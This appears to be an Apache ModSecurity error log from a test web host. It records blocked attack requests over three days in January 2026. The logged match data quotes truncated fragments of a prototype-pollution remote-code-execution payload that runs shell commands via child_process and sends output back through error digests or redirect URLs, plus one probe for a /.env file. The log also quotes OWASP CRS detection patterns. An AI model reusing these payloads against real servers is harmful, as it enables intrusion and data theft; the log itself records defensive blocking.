[Wed Jan 21 18:49:42.419769 2026] [:error] [pid 1564945] [client 35.225.81.143:27696] [client 35.225.81.143] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: String.fromCharCode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var reject_bridge = arguments[1]; (Promise.all([Function('return import(\\x5c\\x22node:child_process\\x5c\\x22)')(), Function('return import(\\x5c\\x22node:zlib\\x5c\\x22)')()]).then(([cp, zlib]) => { return new Promise((resolve, reject) => { ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXERtoHYzrzRLe9i5w9fMQAAAAs"]
[Wed Jan 21 18:49:42.421680 2026] [:error] [pid 1564945] [client 35.225.81.143:27696] [client 35.225.81.143] ModSecurity: Rule 7f43394ed320 [id "941140"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "179"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXERtoHYzrzRLe9i5w9fMQAAAAs"]
[Wed Jan 21 18:49:42.421814 2026] [:error] [pid 1564945] [client 35.225.81.143:27696] [client 35.225.81.143] ModSecurity: Rule 7f43394e4030 [id "941160"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "218"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXERtoHYzrzRLe9i5w9fMQAAAAs"]
[Wed Jan 21 18:49:42.428496 2026] [:error] [pid 1564945] [client 35.225.81.143:27696] [client 35.225.81.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXERtoHYzrzRLe9i5w9fMQAAAAs"]
[Wed Jan 21 18:49:42.428660 2026] [:error] [pid 1564945] [client 35.225.81.143:27696] [client 35.225.81.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXERtoHYzrzRLe9i5w9fMQAAAAs"]
[Thu Jan 22 18:00:54.063887 2026] [:error] [pid 1574630] [client 104.238.133.177:1332] [client 104.238.133.177] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${encodeuricomponent(string(res))} 307 `}) _chunks:$q2 _formdata:{get:$1:constructor:constructor}}} found within ARGS:0: {then:$1:__proto__:then status:resolved_model reason:-1 value:{then:$b1337} _response:{_prefix:var res=(function(){var _r=typeof require!==undefined?require:(process.mainmodule?process.mainmodule.require.bind(process.mainmodule):(typeof globalthis.require!==undefined?globalthis.require:null)) return _r(child_process).execsync(uname -m).tostring() })() throw object.assign(..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXJXxn8-ZGHUgHJ2BM_f-AAAAAE"]
[Thu Jan 22 18:00:54.064348 2026] [:error] [pid 1574630] [client 104.238.133.177:1332] [client 104.238.133.177] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('uname -m').toString..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXJXxn8-ZGHUgHJ2BM_f-AAAAAE"]
[Thu Jan 22 18:00:54.065765 2026] [:error] [pid 1574630] [client 104.238.133.177:1332] [client 104.238.133.177] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXJXxn8-ZGHUgHJ2BM_f-AAAAAE"]
[Thu Jan 22 18:00:54.065940 2026] [:error] [pid 1574630] [client 104.238.133.177:1332] [client 104.238.133.177] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXJXxn8-ZGHUgHJ2BM_f-AAAAAE"]
[Thu Jan 22 18:00:54.858456 2026] [:error] [pid 1576470] [client 104.238.133.177:25663] [client 104.238.133.177] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((6 7))test).tostring() })() throw object.assign(new error(next_redirect) {digest:`next_redirect push/x?d=${encodeuricomponent(string(res)) found within ARGS:0: {then:$1:__proto__:then status:resolved_model reason:-1 value:{then:$b1337} _response:{_prefix:var res=(function(){var _r=typeof require!==undefined?require:(process.mainmodule?process.mainmodule.require.bind(process.mainmodule):(typeof globalthis.require!==undefined?globalthis.require:null)) return _r(child_process).execsync(echo ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXJXxoaM9XEzbVu2YXhyuwAAAAc"]
[Thu Jan 22 18:00:54.858798 2026] [:error] [pid 1576470] [client 104.238.133.177:25663] [client 104.238.133.177] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('echo TEST$((6+7))TE..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXJXxoaM9XEzbVu2YXhyuwAAAAc"]
[Thu Jan 22 18:00:54.858859 2026] [:error] [pid 1576470] [client 104.238.133.177:25663] [client 104.238.133.177] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('echo TEST$((6 7))TE..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXJXxoaM9XEzbVu2YXhyuwAAAAc"]
[Thu Jan 22 18:00:54.860230 2026] [:error] [pid 1576470] [client 104.238.133.177:25663] [client 104.238.133.177] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXJXxoaM9XEzbVu2YXhyuwAAAAc"]
[Thu Jan 22 18:00:54.860406 2026] [:error] [pid 1576470] [client 104.238.133.177:25663] [client 104.238.133.177] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXJXxoaM9XEzbVu2YXhyuwAAAAc"]
[Thu Jan 22 18:42:02.144899 2026] [:error] [pid 1576471] [client 204.76.203.25:50376] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aXJhaqukQpqT0S6ULsLozwAAAAg"]
[Thu Jan 22 18:42:02.145193 2026] [:error] [pid 1576471] [client 204.76.203.25:50376] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aXJhaqukQpqT0S6ULsLozwAAAAg"]
[Thu Jan 22 18:42:02.145362 2026] [:error] [pid 1576471] [client 204.76.203.25:50376] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aXJhaqukQpqT0S6ULsLozwAAAAg"]
[Fri Jan 23 01:08:14.109899 2026] [:error] [pid 1593964] [client 95.216.150.121:57590] [client 95.216.150.121] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${encodeuricomponent(string(res))} 307 `}) _chunks:$q2 _formdata:{get:$1:constructor:constructor}}} found within ARGS:0: {then:$1:__proto__:then status:resolved_model reason:-1 value:{then:$b1337} _response:{_prefix:var res=(function(){var _r=typeof require!==undefined?require:(process.mainmodule?process.mainmodule.require.bind(process.mainmodule):(typeof globalthis.require!==undefined?globalthis.require:null)) return _r(child_process).execsync(uname -m).tostring() })() throw object.assign(..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXK77koUE7ZKeBk4FBdvgAAAAAA"]
[Fri Jan 23 01:08:14.110292 2026] [:error] [pid 1593964] [client 95.216.150.121:57590] [client 95.216.150.121] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('uname -m').toString..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXK77koUE7ZKeBk4FBdvgAAAAAA"]
[Fri Jan 23 01:08:14.111709 2026] [:error] [pid 1593964] [client 95.216.150.121:57590] [client 95.216.150.121] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXK77koUE7ZKeBk4FBdvgAAAAAA"]
[Fri Jan 23 01:08:14.111896 2026] [:error] [pid 1593964] [client 95.216.150.121:57590] [client 95.216.150.121] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXK77koUE7ZKeBk4FBdvgAAAAAA"]
[Fri Jan 23 01:08:14.391431 2026] [:error] [pid 1594364] [client 95.216.150.121:57594] [client 95.216.150.121] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((6 7))test).tostring() })() throw object.assign(new error(next_redirect) {digest:`next_redirect push/x?d=${encodeuricomponent(string(res)) found within ARGS:0: {then:$1:__proto__:then status:resolved_model reason:-1 value:{then:$b1337} _response:{_prefix:var res=(function(){var _r=typeof require!==undefined?require:(process.mainmodule?process.mainmodule.require.bind(process.mainmodule):(typeof globalthis.require!==undefined?globalthis.require:null)) return _r(child_process).execsync(echo ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXK77ryNlo8zzvUv8YqqfQAAAAM"]
[Fri Jan 23 01:08:14.391784 2026] [:error] [pid 1594364] [client 95.216.150.121:57594] [client 95.216.150.121] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('echo TEST$((6+7))TE..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXK77ryNlo8zzvUv8YqqfQAAAAM"]
[Fri Jan 23 01:08:14.391834 2026] [:error] [pid 1594364] [client 95.216.150.121:57594] [client 95.216.150.121] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('echo TEST$((6 7))TE..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXK77ryNlo8zzvUv8YqqfQAAAAM"]
[Fri Jan 23 01:08:14.393184 2026] [:error] [pid 1594364] [client 95.216.150.121:57594] [client 95.216.150.121] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXK77ryNlo8zzvUv8YqqfQAAAAM"]
[Fri Jan 23 01:08:14.393409 2026] [:error] [pid 1594364] [client 95.216.150.121:57594] [client 95.216.150.121] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXK77ryNlo8zzvUv8YqqfQAAAAM"]
[Fri Jan 23 03:37:20.984633 2026] [:error] [pid 1596303] [client 172.190.240.176:5312] [client 172.190.240.176] ModSecurity: Rule 7fc31f94e898 [id "932110"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "258"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXLe4GMtiljrXZ04d2upWgAAAAE"]
[Fri Jan 23 03:37:20.984723 2026] [:error] [pid 1596303] [client 172.190.240.176:5312] [client 172.190.240.176] ModSecurity: Rule 7fc31f943760 [id "932115"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "298"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXLe4GMtiljrXZ04d2upWgAAAAE"]
[Fri Jan 23 03:37:20.986437 2026] [:error] [pid 1596303] [client 172.190.240.176:5312] [client 172.190.240.176] ModSecurity: Warning. Pattern match "(?i)\\\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "350"] [id "933160"] [msg "PHP Injection Attack: High-Risk PHP Function Call Found"] [data "Matched Data: eval(user_code); Promise.resolve(val).then(function(v) { var res_str = (typeof v === 'object') ? JSON.stringify(v) : String(v); try { res_str = zlib.deflateSync(res_str); } catch(e) {} var res_hex = global[String.fromCharCode(66,117,102,102,101,114)].from(res_str).toString('hex'); reject(Object.assign(new Error('RCE_RES'), { digest: res_hex })); }).catch(function(e) { reject(Object.assign(new Er..."] [severity "CRITICAL"] [ver "OWASP_C [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXLe4GMtiljrXZ04d2upWgAAAAE"]
[Fri Jan 23 03:37:20.986566 2026] [:error] [pid 1596303] [client 172.190.240.176:5312] [client 172.190.240.176] ModSecurity: Rule 7fc31f594bf8 [id "933210"][file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"][line "504"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXLe4GMtiljrXZ04d2upWgAAAAE"]
[Fri Jan 23 03:37:20.986719 2026] [:error] [pid 1596303] [client 172.190.240.176:5312] [client 172.190.240.176] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: String.fromCharCode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var reject_bridge = arguments[1]; (Promise.all([Function('return import(\\x5c\\x22node:child_process\\x5c\\x22)')(), Function('return import(\\x5c\\x22node:zlib\\x5c\\x22)')()]).then(([cp, zlib]) => { return new Promise((resolve, reject) => { ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aXLe4GMtiljrXZ04d2upWgAAAAE"]
